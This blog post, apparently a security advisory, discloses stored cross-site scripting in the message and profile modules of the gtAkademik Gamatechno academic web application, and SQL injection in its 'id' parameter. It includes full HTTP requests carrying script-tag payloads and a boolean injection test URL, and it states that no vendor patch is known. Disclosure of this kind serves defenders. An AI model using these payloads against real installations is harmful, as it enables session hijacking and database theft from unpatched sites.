gtAkademik Gamatechno SQL Injection and Persistent XSS

gtAkademik Gamatechno web application is susceptible to SQL Injection and Cross-site Scripting (XSS).

Stored/Persistent XSS

The web application allows an attacker to inject the XSS script inside the database (stored), because there is no such sanitation process. There is 2 modules suffer with XSS: Message Module and Update Profile Module.

Persistent XSS in Message Module

Message module is a module for internal messaging inside the gtAkademik, we can send an XSS crafted message to others for example we can send it to administrator user.

POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg==
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 169

data[MessageSender]=XXXXXXXXXX&data[MessageReceiver]=XXXXXXXXXX&data[MessageTitle]=<script>&data[MessageContent]=<script>alert("XSS");</script>act=doCompose&compBtn=Kirim

Persistent XSS in User Profile Module (save the user profile)

It’s a module to update the profile, we can inject an XSS into the profile and it save the data to database, so everyone who try to view the profile, vulnerable to XSS attack.

POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/TnKM=
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

tanggal=02/08/1988&alamat_asal=XXXXXXXXXX&alamat=<script>alert("XSS");</script>&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu=&simpan=Simpan

SQL Injection

The web application also susceptible to SQL injection vulnerability, because there is no such sensitization process, this allow an attacker to extract contents of database, and find a lot of important data, for example credentials that stored inside the database.

The parameter ‘id’ is vulnerable to SQL Injection.

http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204' AND '1'='1

Impact

Malicious authenticated users can exploit this vulnerability to execute arbitrary script in the context of a logged in user’s session. Further attack, malicious authenticated users may use sql injection vulnerability to execute arbitrary sql queries, potentially viewing or modifying data on the backend database.

Solution

Currently we are not aware if any updates or patch available from the vendor.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Thomas Gregory

Jai Guru Deva. What the eyes see and the ears hear, the mind believes. Gamer. Free thinker. Pwning @Spentera !